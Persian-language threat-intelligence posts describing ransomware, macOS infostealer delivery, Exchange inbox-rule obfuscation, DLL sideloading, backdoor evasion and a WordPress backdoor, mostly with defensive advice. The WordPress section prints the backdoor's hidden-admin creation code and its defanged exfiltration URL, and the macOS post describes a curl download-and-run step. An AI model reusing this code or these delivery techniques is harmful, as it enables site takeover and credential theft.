✅#BlackLock

باج‌افزار BlackLock

یک گروه پیشرفته و خطرناک با توانایی‌های منحصر به فرد خود، به یک تهدید جدی برای سازمان‌ها تبدیل شده است. این گروه که از مارس ۲۰۲۴ با نام "El Dorado" فعالیت خود را آغاز کرد و سپس به BlackLock تغییر برند داد، با استفاده از زبان برنامه‌نویسی Go، توانسته بدافزاری چند-سکویی توسعه دهد که به صورت یکپارچه بر روی سیستم‌های ویندوز، لینوکس و حتی محیط‌های VMware ESXi قابل اجراست. این ویژگی، سطح حمله را به طرز چشمگیری افزایش داده و به مهاجمین اجازه می‌دهد کل زیرساخت IT یک سازمان را به صورت همزمان آلوده کنند.

معماری حمله و تکنیک‌های پیشرفته

این باج‌افزار با جذب Affiliateهای ماهر از طریق انجمن‌های زیرزمینی مانند RAMP در فضای سایبری روسی‌زبان، گستره حملات خود را وسعت می‌بخشد. ویژگی‌های فنی این باج‌افزار شامل موارد زیر است:

* روش‌های رمزگذاری دو لایه: بدافزار برای رمزگذاری فایل‌ها از الگوریتم ChaCha20 استفاده می‌کند. برای هر فایل، یک کلید (FileKey) و یک Nonce تصادفی تولید می‌شود. این کلیدها سپس با استفاده از تکنیک Elliptic Curve Diffie-Hellman (ECDH) و الگوریتم secretbox.Seal() رمزگذاری شده و به متادیتای هر فایل اضافه می‌گردند. این رویکرد دو مرحله‌ای، بازگردانی اطلاعات بدون ابزارهای مهاجمان را عملاً غیرممکن می‌سازد.

* قابلیت‌های انعطاف‌پذیر: بدافزار از آرگومان‌های خط فرمان مختلفی پشتیبانی می‌کند که به مهاجم امکان کنترل کامل می‌دهد:

۔* -path: برای رمزگذاری مسیرهای خاص.
۔* -delay: برای تأخیر در اجرای بدافزار.
۔* -threads: برای بهینه‌سازی سرعت رمزگذاری.
۔* -perc: برای رمزگذاری جزئی فایل‌ها (Partial Encryption) که سرعت حمله را افزایش و از سوی دیگر احتمال شناسایی را کاهش می‌دهد.

* حرکت جانبی : برای گسترش در شبکه‌های ویندوزی، BlackLock از پروژه‌های متن‌باز مانند go-smb2 برای اسکن و دسترسی به پوشه‌های اشتراکی SMB استفاده می‌کند. این بدافزار می‌تواند با استفاده از پسوردهای Plaintext یا NTLM hashها، در شبکه به صورت جانبی حرکت کرده و سیستم‌های ذخیره‌سازی تحت شبکه را همزمان رمزگذاری کند.

* تخریب شواهد و راه‌های بازیابی: BlackLock از روش‌های پیچیده‌ای برای حذف Volume Shadow Copyها و محتویات Recycle Bin استفاده می‌کند. به جای استفاده از دستورات خط فرمان معمول مانند vssadmin.exe که به راحتی توسط راهکارهای امنیتی شناسایی می‌شوند، این بدافزار با ساخت COM objectها، کوئری‌های WMI را از طریق Shellcode که مستقیماً در حافظه بارگذاری شده است، اجرا می‌کند. این تکنیک، شناسایی و تشخیص را بسیار دشوار می‌کند.

باج‌خواهی و روانشناسی حمله

پیام باج‌خواهی که با عنوان HOW_RETURN_YOUR_DATA.TXT در هر دایرکتوری ایجاد می‌شود، علاوه بر درخواست باج، حاوی تهدیداتی مبنی بر افشای داده‌ها به مشتریان و عموم است. این استراتژی Double Extortion (اخاذی مضاعف) ، با ایجاد فشار روانی شدید، سازمان‌ها را مجبور به پرداخت باج می‌کند.

پیچیدگی فنی ، به‌خصوص قابلیت چند-سکویی بودن، توانایی‌های استتار و استفاده از تکنیک‌های پیشرفته برای حرکت جانبی و تخریب داده‌ها، آن را به یکی از تهدیدهای برجسته در فضای سایبری تبدیل کرده است. برای مقابله مؤثر با این باج‌افزار در سطح یک سازمان، یک رویکرد چندلایه ضروری است:

1. حفاظت از Endpointها و سیستم‌ها:

* استفاده از راهکارهای (EDR) و (XDR) برای شناسایی رفتار غیرعادی بدافزار، به‌ویژه تکنیک‌های Load کردن Shellcode در حافظه یا استفاده از ابزارهای بومی سیستم (Living off the land).

* مدیریت پچینگ: به‌روزرسانی مداوم سیستم‌عامل‌ها، هایپروایزرها (به‌ویژه VMware ESXi) و نرم‌افزارهای کاربردی، جهت بستن مسیرهای نفوذ اولیه.

2. امنیت شبکه:

* تقسیم‌بندی شبکه: جداسازی سیستم‌های حیاتی از بخش‌های کمتر حساس شبکه، برای جلوگیری از حرکت جانبی (Lateral Movement) در صورت آلوده شدن یک سیستم.

* محدودسازی SMB: غیرفعال‌سازی یا محدود کردن ترافیک پروتکل SMB در نقاط غیرضروری شبکه و همچنین استفاده از فایروال‌های مبتنی بر هویت برای کنترل دقیق دسترسی‌ها.

3. مدیریت هویت و دسترسی (IAM):

* پیاده‌سازی Multi-Factor Authentication (MFA) برای تمامی سرویس‌ها، به‌ویژه Remote Accessها و حساب‌های Privileged.

* استفاده از اصل Least Privilege یا حداقل دسترسی برای کاربران و ادمین‌ها، تا در صورت سرقت اعتبارنامه، سطح نفوذ مهاجم محدود شود.

4. بازیابی اطلاعات:

* داشتن Backupهای منظم، ایزوله (Offline) و با قابلیت بازیابی سریع. تست مداوم فرآیند بازیابی بک‌آپ‌ها حیاتی است. این بک‌آپ‌ها باید در مقابل حملات بدافزاری مانند BlackLock محافظت شده باشند.

@NullError_ir

✅#macOS

حمله APT-گونه جدید برای فریب کاربران macOS
با بهره‌گیری از SEO و GitHub Pages برای توزیع Atomic Stealer

کمپینی که جدیدا علیه کاربران سیستم‌عامل macOS شناسایی شده، نمونه بارزی از این تکامل است که فراتر از حملات فیشینگ ساده عمل می‌کند و از ترکیب هوشمندانه (SEO) و پلتفرم‌های معتبر برای افزایش موفقیت خود بهره می‌برد. این کمپین، بدافزار Atomic Stealer (که با نام AMOS نیز شناخته می‌شود) را به قربانیان تحویل می‌دهد.

زنجیره حمله (Attack Chain)

این عملیات سایبری یک زنجیره حمله چندمرحله‌ای و پیچیده را دنبال می‌کند که از فریب اولیه کاربر تا سرقت اطلاعات حساس، طراحی شده است:

1. مرحله اول: SEO Poisoning
مهاجمین با ایجاد ریپازیتوری‌های جعلی در GitHub که نام‌هایی شبیه به نرم‌افزارهای محبوب (مانند LastPass یا سایر ابزارهای مدیریت پسورد) دارند، از تکنیک‌های SEO استفاده می‌کنند. این ریپازیتوری‌ها به گونه‌ای بهینه‌سازی می‌شوند که در نتایج موتورهای جستجو مانند گوگل و بینگ، در رتبه‌های بالا قرار بگیرند. کاربرانی که به دنبال نرم‌افزار مورد نظر خود هستند، به راحتی به این نتایج جعلی اعتماد کرده و روی آن‌ها کلیک می‌کنند.

2. مرحله دوم: Faking a Trustworthy Platform
با کلیک روی لینک، کاربر به یک صفحه GitHub Pages منتقل می‌شود که ظاهری کاملاً رسمی و معتبر دارد. این صفحه حاوی دستورالعمل‌ها و لینک‌های دانلود فریبنده‌ای است که کاربر را به انجام اقدامات مخرب ترغیب می‌کند. این تاکتیک، از اعتبار GitHub به عنوان یک پلتفرم معتبر برای میزبانی کد و پروژه‌ها سوءاستفاده می‌کند.

3. مرحله سوم: Redirect to Staging Site
لینک‌های موجود در صفحه GitHub Pages، کاربر را به یک "Staging Site" یا وب‌سایت میانی هدایت می‌کنند. در نمونه‌ای که LastPass Threat Intelligence شناسایی کرد، قربانی به صفحه‌ای با آدرس hxxps://ahoastock825[.]github[.]io/ و سپس به macprograms-pro[.]com منتقل می‌شد. این مرحله به مهاجمین اجازه می‌دهد که آدرس اصلی بدافزار را پنهان نگه داشته و در صورت شناسایی، به راحتی آن را تغییر دهند.

4. مرحله چهارم: Command Injection & Payload Delivery
در Staging Site، از کاربر خواسته می‌شود تا یک دستور Terminal را اجرا کند. این دستور معمولاً از طریق `curl` یک اسکریپت شل مخرب را از یک سرور خارجی (مانند bonoud[.]com/get3/install.sh) دانلود و اجرا می‌کند. این اسکریپت به صورت Base64-encoded پنهان شده تا از شناسایی اولیه توسط فایروال‌ها یا ابزارهای امنیتی ساده جلوگیری کند.

5. مرحله پنجم: Exfiltration and Persistence
اسکریپت دانلود شده، بدافزار Atomic Stealer را روی سیستم قربانی نصب می‌کند. این بدافزار با هدف سرقت اطلاعات حساس مانند پسوردها، کوکی‌های مرورگر، اطلاعات کیف پول‌های ارز دیجیتال و گواهینامه‌های سیستمی طراحی شده است. پس از نصب، بدافزار با ایجاد Persistence (مانند افزودن به آیتم‌های راه‌اندازی سیستم) از بین رفتن خود جلوگیری کرده و داده‌های سرقت شده را به سرور Command and Control (C2) مهاجمین ارسال می‌کند.

تکنیک‌های مهاجمین و درس‌های APT

این حمله شباهت‌های قابل توجهی به تاکتیک‌های گروه‌های (APT) دارد، که نشان‌دهنده سطح بالای طراحی و اجرای آن است:

* استفاده از زیرساخت‌های توزیع‌شده (Distributed Infrastructure): مهاجمین با ایجاد چندین یوزرنیم و ریپازیتوری در GitHub، به محض حذف یک ریپازیتوری، از دیگری استفاده می‌کنند. این رویکرد، Resilience یا مقاومت عملیاتی آن‌ها را افزایش می‌دهد.

* استفاده از پلتفرم‌های معتبر (Trusted Platforms): بهره‌برداری از GitHub به عنوان یک پلتفرم قانونی و قابل اعتماد، اعتماد قربانی را به شدت افزایش می‌دهد و از شناسایی سریع توسط ابزارهای امنیتی جلوگیری می‌کند.

* پنهان‌کاری (Obfuscation): استفاده از تکنیک‌هایی مانند Base64-encoding برای پنهان کردن URLهای مخرب، فرآیند تحلیل و تشخیص بدافزار را پیچیده‌تر می‌کند.

@NullError_ir

✅#Inboxfuscation

ابزار Inboxfuscation
ابزاری که قواعد صندوق ورودی Exchange را دور می‌زند و یک روش APT جدید برای Persistence ارائه می‌دهد

در دنیای سایبر امروزی، حمله‌کنندگان به طور فزاینده‌ای از تکنیک‌های Living off the Land (LotL) و ابزارهای بومی سیستم‌ها برای ماندگاری (Persistence) و استخراج داده (Exfiltration) استفاده می‌کنند. یکی از این اهداف مهم، قوانین صندوق ورودی (Inbox Rules) در Microsoft Exchange است که به دلیل ماهیت کاربردی‌شان، اغلب کمتر مورد توجه تیم‌های دفاعی قرار می‌گیرند.

ابزار جدیدی به نام Inboxfuscation که توسط شرکت Permiso توسعه یافته، یک دیدگاه جدید و پیشرفته از چگونگی سوءاستفاده از این مکانیزم‌ها را به نمایش می‌گذارد. این ابزار از تکنیک‌های Unicode-based obfuscation بهره می‌برد تا قواعد مخرب را به گونه‌ای ایجاد کند که از دید ابزارهای امنیتی سنتی و حتی بازبینی‌های انسانی پنهان بمانند. در واقع، این ابزار یک نقطه کور (Blind Spot) حیاتی در امنیت ایمیل را آشکار می‌سازد که می‌تواند توسط مهاجمان پیشرفته (APT) مورد بهره‌برداری قرار گیرد.

مکانیزم کار و Obfuscation پیشرفته با Unicode

در حملات سنتی مربوط به Inbox Rules، مهاجمان از کلمات کلیدی و اکشن‌های ساده‌ای مثل Forward یا Delete برای ساخت قواعد خود استفاده می‌کردند. این روش‌ها به راحتی توسط مکانیزم‌های تشخیص مبتنی بر کلمات کلیدی یا Regex شناسایی می‌شوند. اما Inboxfuscation این پارادایم را به طور کامل تغییر می‌دهد.

این ابزار با جایگزینی کاراکترهای ASCII با نسخه‌های مشابه Unicode ، تزریق کاراکترهای Zero-Width ، دستکاری جهت متن (Bidirectional Text) و ترکیب چندین تکنیک مختلف، قواعدی را می‌سازد که ظاهراً بی‌ضرر به نظر می‌رسند اما عملکرد کاملاً مخربی دارند.

به عنوان مثال، کلمه secret می‌تواند با استفاده از این تکنیک‌ها به فرم‌های زیر تغییر یابد:

۔* Ⓢⓔⓒⓡⓔⓣ: استفاده از کاراکترهای Mathematical Alphanumeric Symbols (U+1D4B6) که در ظاهر شبیه حروف عادی هستند.

۔* s‍e‍c‍r‍e‍t: تزریق کاراکترهای Zero-Width Joiner (U+200D) بین حروف. این کاراکترها در خروجی‌های متنی مثل Get-InboxRule دیده نمی‌شوند اما در پردازش موتور Exchange به عنوان حروف به هم پیوسته تفسیر می‌شوند.

۔* tse‍rces: استفاده از کاراکتر Right-to-Left Override (U+202E) که جهت متن را برعکس می‌کند.

این تکنیک‌ها باعث می‌شوند که خروجی دستوراتی مانند Get-InboxRule در PowerShell، قواعد را به صورت عادی نمایش دهد و چشم انسان قادر به تشخیص این obfuscation نباشد، در حالی که موتور Exchange آن را به درستی تفسیر می‌کند و ایمیل‌هایی با محتوای secret را مورد هدف قرار می‌دهد.

تکنیک‌های Obfuscation عملکردی

۔**Inboxfuscation** تنها به obfuscation متنی محدود نمی‌شود و ترفندهای عملکردی دیگری را نیز معرفی می‌کند. برای مثال، این ابزار می‌تواند قواعدی بسازد که به جای ارسال ایمیل به آدرس خارجی، آن‌ها را به پوشه‌های غیرمعمول مانند Calendar یا Tasks منتقل کند. این کار باعث می‌شود که این فعالیت‌ها از رصد ابزارهایی که به صورت معمول تنها روی پوشه Sent Items یا Deleted Items نظارت دارند، خارج شود.

یکی دیگر از تکنیک‌های خطرناک، تزریق کاراکتر Null (U+0000) به نامِ قانون (Rule's Name) است. این کار باعث می‌شود که در برخی خروجی‌ها نمایش داده نشود و حتی در برخی موارد، retrieval آن را دشوار یا غیرممکن می‌سازد.
مثلا در ترمینال این رو بنویسید تا متوجه این کارکتر شوید

echo -e 'salam\x00ls'

راهکار مقابله و نتیجه‌گیری

با توجه به این که ابزارهای امنیتی سنتی بر اساس تطابق الگوهای ASCII کار می‌کنند و فرض می‌کنند که محتوا قابل خواندن و ساده است، در برابر Inboxfuscation کاملاً آسیب‌پذیر هستند. برای مقابله با این تهدید، تیم‌های امنیتی باید استراتژی‌های زیر را به کار گیرند:

1۔ پیاده‌سازی Detection Rules با قابلیت Unicode-Aware: سیستم‌های SIEM و راهکارهای امنیتی باید به گونه‌ای به‌روزرسانی شوند که بتوانند کاراکترهای غیرمعمول Unicode، به‌ویژه کاراکترهای Zero-Width یا Right-to-Left را در قوانین ایمیل تشخیص دهند و آن‌ها را به عنوان پرچم‌های مشکوک (Suspicious Flags) علامت‌گذاری کنند.

2۔ Audit و تحلیل دوره‌ای قوانین: انجام بررسی‌های جامع و دوره‌ای بر روی تمامی Inbox Rules در سازمان، یک امر حیاتی است. این بررسی‌ها باید شامل اسکریپت‌هایی باشند که خروجی Get-InboxRule را به صورت دقیق بررسی و هرگونه کاراکتر Unicode غیرعادی را تحلیل کنند.

✅#DDoS

شرکت کلودفلر (Cloudflare) اعلام کرد حمله DDoS با سرعت ۲۲.۲ ترابیت بر ثانیه، رکورد جهانی جدیدی را در اینترنت شکست .. این حمله ٤۰ ثانیه طول کشید و خدا میداند در پس زمینه چه خبرهایی شده است 💀.


@NullError_ir

✅#Nimbus_Manticore

گروه Nimbus Manticore با بدافزار جدید

این گروه هکری که به ایران منتسب است، در کمپین اخیر خود صنایع دفاعی، مخابراتی و هوانوردی در اروپای غربی (به‌ویژه دانمارک، سوئد و پرتغال) را هدف قرار داده است. رویکرد این گروه نشان‌دهنده بلوغ عملیاتی بالا و استفاده از تکنیک‌های پیشرفته برای فرار از شناسایی است.

۱.آغاز خمله

حمله با یک کمپین Spear-Phishing هدفمند آغاز می‌شود. مهاجمان با جعل هویت استخدام‌کنندگان شرکت‌های معتبر هوافضا مانند Boeing، Airbus و Rheinmetall، قربانیان را به پورتال‌های شغلی جعلی هدایت می‌کنند. این وب‌سایت‌ها با استفاده از قالب‌های مبتنی بر React ساخته شده و شباهت زیادی به نمونه‌های واقعی دارند. نکته قابل توجه در این مرحله، اختصاص URL و اعتبارنامه ورود (Credentials) منحصربه‌فرد برای هر قربانی است که به مهاجمان امکان ردیابی دقیق و مدیریت دسترسی را می‌دهد.

۲. زنجیره آلودگی و نوآوری فنی

زنجیره آلودگی این بدافزار چندمرحله‌ای و بسیار پیچیده است و از تکنیک‌های خلاقانه‌ای برای دور زدن مکانیزم‌های امنیتی بهره می‌برد.

* فایل اولیه: قربانی پس از ورود به پورتال جعلی، یک فایل آرشیو مخرب (مانند Survey.zip) را دانلود می‌کند. این فایل شامل یک فایل اجرایی قانونی به نام Setup.exe و چندین DLL مخرب است.

* تکنیک نوین DLL Sideloading: نوآوری اصلی این حمله در نحوه اجرای DLL Sideloading نهفته است.

1. با اجرای Setup.exe ، بدافزار از طریق فراخوانی توابع سطح پایین NT API (مشخصاً RtlCreateProcessParameters) ، ساختار RTL_USER_PROCESS_PARAMETERS پروسس را دستکاری می‌کند.

2. این دستکاری به‌طور خاص پارامتر DllPath را تغییر می‌دهد. این عمل باعث می‌شود که ترتیب جستجوی DLL در ویندوز (Windows DLL search order) تغییر کرده و DLL مخرب xmllite.dll از دایرکتوری فعلی (محل فایل‌های استخراج‌شده) بارگذاری شود، نه از مسیر سیستمی System32.

* سوءاستفاده از فرآیندهای معتبر ویندوز:

1. در مرحله بعد، DLL مخرب userenv.dll ، با استفاده از فراخوانی‌های سطح پایین ntdll، یک کامپوننت قانونی و امضاشده Windows Defender به نام SenseSampleUploader.exe را اجرا می‌کند.

2. از آنجایی که این فایل اجرایی معتبر نیز به xmllite.dll وابستگی دارد و به دلیل دستکاری مسیر جستجو، نسخه مخرب xmllite.dll توسط این فرآیند معتبر بارگذاری می‌شود. این تکنیک به‌طور مؤثری مکانیزم‌های دفاعی مبتنی بر شهرت و لیست سفید (Whitelisting) را دور می‌زند.

* ایجاد پایداری:

1. پس از بارگذاری موفق، xmllite.dll یک دایرکتوری کاری در مسیر %AppData%\Local\Microsoft\MigAutoPlay\ ایجاد کرده و کامپوننت‌های بک‌دور را در آن کپی می‌کند.

2. سپس یک Scheduled Task ایجاد می‌کند تا فایل MigAutoPlay.exe را به‌صورت دوره‌ای اجرا کند. این فایل اجرایی نیز به نوبه خود، DLL مخرب userenv.dll را که حاوی عملکرد اصلی بک‌دور است، Sideload می‌کند.

۳. پیلود نهایی: بک‌دور MiniJunk

بک‌دور اصلی که در این حمله استفاده شده، MiniJunk نام دارد و نسخه تکامل‌یافته‌ای از بدافزار قبلی این گروه (Minibike) است. این بک‌دور قابلیت‌های استانداردی مانند جمع‌آوری اطلاعات سیستم، مدیریت فایل‌ها (خواندن، نوشتن، حذف)، ایجاد فرآیندهای جدید و بارگذاری DLL‌های دلخواه را دارد.

۴. تکنیک‌های پیشرفته فرار از تحلیل

نقطه قوت اصلی بدافزار MiniJunk، استفاده سنگین از تکنیک‌های Obfuscation در سطح کامپایلر است. تحلیلگران معتقدند که مهاجمان از یک Pass سفارشی برای کامپایلر LLVM استفاده کرده‌اند تا تحلیل ایستا و مهندسی معکوس نمونه‌ها را تقریباً غیرممکن سازند. این تکنیک‌ها شامل موارد زیر است:

* درج کدهای بیهوده (Junk Code Insertion): افزودن کدهای اضافی که هیچ تأثیری بر عملکرد اصلی ندارند.

* مبهم‌سازی جریان کنترل (Control-Flow Obfuscation): پیچیده کردن گراف جریان کنترل برنامه با استفاده از پرش‌های شرطی غیرمستقیم و ساختارهای نامفهوم.

* گزاره‌های مبهم (Opaque Predicates): استفاده از شروطی که نتیجه آن‌ها در زمان کامپایل مشخص است اما تحلیلگر را گمراه می‌کند.

* رمزنگاری رشته‌ها (Encrypted Strings): هر رشته متنی در بدافزار با یک کلید منحصربه‌فرد رمزنگاری شده است تا از شناسایی مبتنی بر رشته جلوگیری شود.

* مبهم‌سازی فراخوانی توابع: آدرس توابع از طریق عملیات حسابی محاسبه می‌شود تا فراخوانی‌های مستقیم API پنهان شوند.

@NullError_ir

✅#YiBackdoor

ظهور بدافزار جدید YiBackdoor

بدافزار YiBackdoor که برای اولین بار در ژوئن 2025 شناسایی شده، یک خانواده بدافزاری جدید و پیچیده است که به دلیل همپوشانی قابل توجه کد با بدافزارهای شناخته‌شده IcedID و Latrodectus ، توجه تحلیلگران را به خود جلب کرده است. این بدافزار به عنوان یک بکدور عمل می‌کند و به مهاجمان اجازه می‌دهد تا کنترل سیستم قربانی را به دست گرفته، اطلاعات حساس را جمع‌آوری کرده و دستورات دلخواه را اجرا کنند.

نکات کلیدی و یافته‌های اصلی

* ارتباط با حملات باج‌افزاری: مشابه IcedID که از یک تروجان بانکی به یک ابزار دسترسی اولیه (Initial Access) برای حملات باج‌افزاری تبدیل شد، YiBackdoor نیز پتانسیل استفاده در چنین سناریوهایی را دارد.

* اشتراکات کد: این بدافزار بخش‌های قابل توجهی از کد خود، از جمله یک الگوریتم رمزنگاری منحصربه‌فرد را با IcedID و Latrodectus به اشتراک می‌گذارد که نشان‌دهنده ارتباط احتمالی بین تیم‌های توسعه‌دهنده آنهاست.

* تکنیک‌های ضدتحلیل: YiBackdoor مجهز به مکانیزم‌هایی برای شناسایی و دور زدن محیط‌های مجازی‌سازی شده و سندباکس‌های تحلیل بدافزار است.

* قابلیت‌های ماژولار: عملکرد اصلی بدافزار از طریق پلاگین‌ها گسترش می‌یابد، که به مهاجمان اجازه می‌دهد قابلیت‌های جدیدی را به صورت پویا به آن اضافه کنند.

* مرحله توسعه: با توجه به استقرار محدود و وجود برخی آدرس‌های IP محلی در پیکربندی، به نظر می‌رسد این بدافزار هنوز در مراحل توسعه یا آزمایش قرار دارد.

تحلیل فنی عمیق

۱. تکنیک‌های ضدتحلیل و فرار از شناسایی

این YiBackdoor از چندین تکنیک برای جلوگیری از تحلیل و شناسایی شدن توسط ابزارهای امنیتی استفاده می‌کند:

* بارگذاری دینامیک توابع API: به جای فراخوانی مستقیم توابع ویندوز (Windows API)، بدافزار با پیمایش لیست ماژول‌های بارگذاری شده و محاسبه هش مبتنی بر ROR برای نام هر تابع، آدرس توابع مورد نظر خود را به صورت پویا پیدا می‌کند. این روش از تحلیل استاتیک و شناسایی مبتنی بر ایمپورت‌ها جلوگیری می‌کند.

* شناسایی محیط مجازی:

* دستور CPUID: با فراخوانی دستور CPUID با پارامتر 0x40000000 ، اطلاعات هایپروایزر را استخراج کرده و آن را با مقادیر شناخته‌شده برای VMWare , Xen , KVM , VirtualBox , Hyper-V و Parallels مقایسه می‌کند.

* اندازه‌گیری زمان اجرا : بدافزار با استفاده از دستور rdtsc (Read Time-Stamp Counter) زمان اجرای دستور CPUID را اندازه‌گیری می‌کند. از آنجایی که اجرای CPUID در یک ماشین مجازی باعث یک VM exit می‌شود که زمان‌بر است، تفاوت زمانی قابل توجهی ایجاد می‌شود. این فرآیند ۱۶ بار تکرار شده و اگر مقدار محاسبه شده نهایی از یک آستانه مشخص (۲۰) بیشتر باشد، بدافزار تشخیص می‌دهد که در یک محیط مجازی در حال اجراست.

* رمزگشایی رشته‌ها در زمان اجرا: رشته‌های حساس به صورت رمز شده در کد قرار دارند و در زمان اجرا با یک کلید ۴ بایتی (منحصر به هر رشته) با عملیات XOR رمزگشایی می‌شوند.

نکته جالب این است که در نسخه تحلیل شده، بدافزار از اطلاعات به دست آمده از این بررسی‌ها استفاده‌ای نمی‌کند و این تکنیک‌ها تأثیری بر رفتار فعلی آن ندارند، که می‌تواند نشانه‌ای از تکامل نیافتن کامل کد باشد.

۲. فاز اولیه و اجرا

* تزریق کد:

1. بدافزار ابتدا با ایجاد یک Mutex با نام مبتنی بر مشخصات میزبان، از اجرای همزمان چند نمونه از خودش جلوگیری می‌کند.

2. سپس بررسی می‌کند که آیا در حافظه یک پروسس تزریق شده قرار دارد یا خیر. اگر در حافظه یک DLL بارگذاری شده باشد، یک پروسس جدید svchost.exe ایجاد می‌کند.

3. کد خود را در حافظه پروسس svchost.exe کپی کرده و تابع RtlExitUserProcess را هوک می‌کند. این هوک شامل یک دستور push برای قراردادن آدرس نقطه ورود بدافزار روی پشته و سپس یک دستور ret است.

4. در نتیجه، درست در لحظه‌ای که پروسس svchost.exe در حال خاتمه یافتن است، اجرای برنامه به کد بدافزار هدایت می‌شود. این تکنیک تزریق غیرمعمول می‌تواند برخی از محصولات امنیتی را دور بزند.

* پایداری:
پس از تزریق موفق، بدافزار خود را در یک پوشه جدید با نام تصادفی کپی کرده و سپس با استفاده از کلید رجیستری Run و دستور regsvr32.exe پایداری خود را در سیستم تضمین می‌کند. در نهایت، فایل اصلی خود را برای پاک کردن ردپا حذف می‌کند.

✅#WordPress

بدافزارهای مخفی وردپرسی

۱. معماری و هدف بدافزار

هدف اصلی این دو فایل، تضمین وجود یک حساب کاربری با سطح دسترسی Administrator است که توسط مهاجم کنترل می‌شود، حتی در صورت پاکسازی نسبی سیستم توسط مدیر سایت.

فایل‌های کلیدی کشف شده:

1۔ ./wp-content/plugins/DebugMaster/DebugMaster.php
یک Backdoor پیچیده و پنهان‌کار که خود را به عنوان یک افزونه قانونی (DebugMaster Pro) جا می‌زند. وظیفه اصلی آن ایجاد حساب کاربری ، Exfiltration اطلاعات و تزریق Payloadهای خارجی است.

2۔ ./wp-user.php
یک اسکریپت ساده‌تر اما تهاجمی که خود را به عنوان یک فایل اصلی (Core) WordPress در روت سایت معرفی کرده و مسئولیت بازآفرینی اجباری حساب کاربری مخرب را بر عهده دارد.

۲. تحلیل فنی DebugMaster.php: پنهان‌کاری، تزریق و C2

این فایل با محتوای به‌شدت Obfuscated و درهم‌ریخته، لایه‌های متعددی از پنهان‌کاری را برای فرار از شناسایی پیاده‌سازی کرده است:

الف. مکانیزم تزریق و پنهان‌سازی حساب کاربری

بدافزار از طریق قطعه کد زیر، یک حساب کاربری Administrator مخفی به نام help را با اعتبارنامه‌های Hardcoded ایجاد می‌کند:

if (!username_exists('help')) {
    $user_id = wp_create_user('help', 'hardcoded_password', 'help@site.com');
    $user = new WP_User($user_id);
    $user->set_role('administrator');
} else {
    $user = get_user_by('login', 'help');
    $user->set_role('administrator');
}

تکنیک‌های پنهان‌کاری:

* حذف از فهرست افزونه‌ها: بدافزار با Hook کردن فیلترهای WordPress، خود را از لیست افزونه‌های نصب شده پنهان می‌کند تا از چشم مدیر سیستم دور بماند.

* فیلتر کردن کاربران: کد مخرب همچنین فیلترهایی را اعمال می‌کند تا حساب کاربری help در لیست کاربران پنل ادمین نمایش داده نشود و امکان حذف دستی آن به سادگی فراهم نباشد.

ب. ارتباط با سرور Command & Control (C2) و Exfiltration داده‌ها

این بخش فنی‌ترین و پیشرفته‌ترین جنبه این Backdoor است. بدافزار برای اطمینان از اطلاع‌رسانی فوری به مهاجم، جزئیات حساب کاربری تازه ایجاد شده را به یک سرور خارجی ارسال می‌کند.

فرآیند Exfiltration:

1. جمع‌آوری داده‌ها: اطلاعات حساس (نام کاربری، رمز عبور، ایمیل و آدرس IP سرور) در قالب یک شیء JSON جمع‌آوری می‌شود.

2. رمزگذاری (Encoding): داده‌های JSON جهت فرار از امضاهای ساده شبکه، با استفاده از الگوریتم Base64 رمزگذاری می‌شوند.

3. ارسال به C2: داده‌های رمزگذاری شده با متد HTTP POST به یک آدرس URL مخفی شده ارسال می‌شوند. آدرس C2 نیز خود با Base64 Obfuscated شده که به hxxps://kickstar-xbloom[.]info/collect[.]php رمزگشایی می‌شود.

این فرآیند نشان‌دهنده یک کانال C2 فعال است که مختصراً برای Data Exfiltration استفاده شده و امکان مدیریت متمرکز اعتبارنامه‌های دزدیده شده را برای مهاجم فراهم می‌آورد.

ج. تزریق Scripts مخرب و ردیابی ادمین

۔ DebugMaster.php همچنین کدی را برای تزریق اسکریپت‌های خارجی به وب‌سایت پیاده‌سازی می‌کند. این اسکریپت‌ها برای تمام بازدیدکنندگان بارگذاری می‌شوند، مگر آنکه کاربر جاری یک Administrator باشد یا IP او قبلاً توسط بدافزار Whitelist شده باشد. علاوه بر این، بدافزار آدرس‌های IP مدیران سایت را جمع‌آوری و Log می‌کند؛ این اطلاعات می‌تواند برای حملات هدفمندتر یا فیلتر کردن آن‌ها از دریافت Payloadهای مخرب در آینده استفاده شود.

۳. تحلیل فنی wp-user.php: مکانیزم Resilience

این فایل، نقش پشتیبان و Persistence Layer را ایفا می‌کند. محل قرارگیری آن در پوشه روت، یک تلاش آشکار برای تقلید از فایل‌های هسته WordPress است.

منطق بازآفرینی (Recreation Logic):

1. اسکریپت وجود کاربر help را در دیتابیس WordPress بررسی می‌کند.

2. اگر کاربر help وجود داشته باشد: آن را حذف کرده و بلافاصله با رمز عبور و سطح دسترسی Administrator مدنظر مهاجم مجدداً ایجاد می‌کند.

3. اگر کاربر help وجود نداشته باشد: آن را به سادگی ایجاد می‌کند.

این منطق تهاجمی تضمین می‌کند که هر تلاشی از سوی مدیر سایت برای حذف حساب کاربری help یا تغییر رمز عبور آن، تنها به بازآفرینی فوری حساب با اعتبارنامه‌های اصلی مهاجم منجر شود. این یک مکانیزم Resilience بسیار قدرتمند است.

۴۔ Indicators of Compromise (IoCs)

برای شناسایی آلودگی، به دنبال شواهد زیر باشید:

فایل‌های مخرب wp-content/plugins/DebugMaster/DebugMaster.php (و دایرکتوری آن)

وجود wp-user.php در پوشه روت

حساب کاربری وجود کاربر Administrator مخفی یا غیرمجاز با نام help

رفتار مشکوک بازآفرینی خودکار حساب‌های ادمین حذف شده

ارتباط شبکه ترافیک خروجی به kickstar-xbloom[.]info یا collect.php

✅#COLDRIVER

تحلیل حملات COLDRIVER با بدافزارهای BAITSWITCH و SIMPLEFIX

گروه روسی COLDRIVER (که با نام‌های Star Blizzard و Callisto نیز شناخته می‌شود) و شهرت آن در هدف‌گیری فعالان جامعه مدنی، روزنامه‌نگاران و گروه‌های اپوزیسیون است، زرادخانه خود را با دو بدافزار جدید به‌روزرسانی کرده است: BAITSWITCH (Downloader) و SIMPLEFIX (PowerShell Backdoor). این کمپین جدید که در سپتامبر ۲۰۲۵ کشف شد، تمرکز بر تکنیک‌های مهندسی اجتماعی داشته و از یک زنجیره آلودگی پیچیده چندمرحله‌ای برای حفظ پایداری و جمع‌آوری اطلاعات استفاده می‌کند.

۱. مکانیزم حمله و مهندسی اجتماعی (ClickFix)

این حمله با تکیه بر ضعف کاربر، از روش ClickFix استفاده می‌کند که اگرچه از نظر فنی پیچیده نیست، اما برای اهداف گروه COLDRIVER بسیار مؤثر بوده است.

